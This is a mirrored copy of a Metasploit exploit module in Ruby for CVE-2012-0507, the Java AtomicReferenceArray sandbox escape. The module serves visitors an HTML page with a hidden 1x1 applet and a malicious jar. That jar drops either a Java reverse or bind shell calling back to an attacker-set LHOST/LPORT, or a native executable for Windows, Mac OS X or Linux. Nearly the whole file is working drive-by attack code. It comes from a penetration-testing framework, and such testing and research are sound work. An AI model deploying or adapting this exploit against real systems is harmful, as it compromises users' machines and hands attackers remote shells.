Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_atomicreferencearray.rb
19511 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
include Msf::Exploit::EXE
11
12
include Msf::Exploit::Remote::BrowserAutopwn
13
autopwn_info({ :javascript => false })
14
15
def initialize(info = {})
16
super(
17
update_info(
18
info,
19
'Name' => 'Java AtomicReferenceArray Type Violation Vulnerability',
20
'Description' => %q{
21
This module exploits a vulnerability due to the fact that
22
AtomicReferenceArray uses the Unsafe class to store a reference in an
23
array directly, which may violate type safety if not used properly.
24
This allows a way to escape the JRE sandbox, and load additional classes
25
in order to perform malicious operations.
26
},
27
'License' => MSF_LICENSE,
28
'Author' => [
29
'Jeroen Frijters', # Initial discovery according to his blog
30
'sinn3r', # metasploit module
31
'juan vazquez', # metasploit module
32
'egypt' # added support for older java versions
33
],
34
'References' => [
35
['CVE', '2012-0507'],
36
['OSVDB', '80724'],
37
['BID', '52161'],
38
['URL', 'http://weblog.ikvm.net/PermaLink.aspx?guid=cd48169a-9405-4f63-9087-798c4a1866d3'],
39
['URL', 'http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx'],
40
['URL', 'http://schierlm.users.sourceforge.net/TypeConfusion.html'],
41
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-0507'],
42
['URL', 'https://www.rapid7.com/blog/post/2012/03/29/cve-2012-0507--java-strikes-again']
43
],
44
'Platform' => %w{java linux osx solaris win},
45
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
46
'Targets' => [
47
[
48
'Generic (Java Payload)',
49
{
50
'Platform' => ['java'],
51
'Arch' => ARCH_JAVA,
52
}
53
],
54
[
55
'Windows x86 (Native Payload)',
56
{
57
'Platform' => 'win',
58
'Arch' => ARCH_X86,
59
}
60
],
61
[
62
'Mac OS X PPC (Native Payload)',
63
{
64
'Platform' => 'osx',
65
'Arch' => ARCH_PPC,
66
}
67
],
68
[
69
'Mac OS X x86 (Native Payload)',
70
{
71
'Platform' => 'osx',
72
'Arch' => ARCH_X86,
73
}
74
],
75
[
76
'Linux x86 (Native Payload)',
77
{
78
'Platform' => 'linux',
79
'Arch' => ARCH_X86,
80
}
81
],
82
],
83
'DefaultTarget' => 0,
84
'DisclosureDate' => '2012-02-14',
85
'Notes' => {
86
'Reliability' => UNKNOWN_RELIABILITY,
87
'Stability' => UNKNOWN_STABILITY,
88
'SideEffects' => UNKNOWN_SIDE_EFFECTS
89
}
90
)
91
)
92
end
93
94
def exploit
95
# load the static jar file
96
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2012-0507.jar")
97
fd = File.open(path, "rb")
98
@jar_data = fd.read(fd.stat.size)
99
fd.close
100
101
super
102
end
103
104
def on_request_uri(cli, request)
105
data = ""
106
host = ""
107
port = ""
108
109
if not request.uri.match(/\.jar$/i)
110
if not request.uri.match(/\/$/)
111
send_redirect(cli, get_resource() + '/', '')
112
return
113
end
114
115
print_status("Sending #{self.name}")
116
117
payload = regenerate_payload(cli)
118
if not payload
119
print_error("Failed to generate the payload.")
120
return
121
end
122
123
if target.name == 'Generic (Java Payload)'
124
if datastore['LHOST']
125
jar = payload.encoded
126
host = datastore['LHOST']
127
port = datastore['LPORT']
128
vprint_status("Sending java reverse shell")
129
else
130
port = datastore['LPORT']
131
host = cli.peerhost
132
vprint_status("Java bind shell")
133
end
134
if jar
135
print_status("Generated jar to drop (#{jar.length} bytes).")
136
jar = Rex::Text.to_hex(jar, prefix = "")
137
else
138
print_error("Failed to generate the executable.")
139
return
140
end
141
else
142
143
# NOTE: The EXE mixin automagically handles detection of arch/platform
144
data = generate_payload_exe
145
146
print_status("Generated executable to drop (#{data.length} bytes).")
147
data = Rex::Text.to_hex(data, prefix = "")
148
149
end
150
151
send_response_html(cli, generate_html(data, jar, host, port), { 'Content-Type' => 'text/html' })
152
return
153
end
154
155
print_status("Sending jar")
156
send_response(cli, generate_jar(), { 'Content-Type' => "application/octet-stream" })
157
158
handler(cli)
159
end
160
161
def generate_html(data, jar, host, port)
162
jar_name = rand_text_alpha(rand(6) + 3) + ".jar"
163
164
html = "<html><head></head>"
165
html += "<body>"
166
html += "<applet archive=\"#{jar_name}\" code=\"msf.x.Exploit.class\" width=\"1\" height=\"1\">"
167
html += "<param name=\"data\" value=\"#{data}\"/>" if data
168
html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
169
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
170
html += "<param name=\"lport\" value=\"#{port}\"/>" if port
171
html += "</applet></body></html>"
172
return html
173
end
174
175
def generate_jar()
176
return @jar_data
177
end
178
end
179
180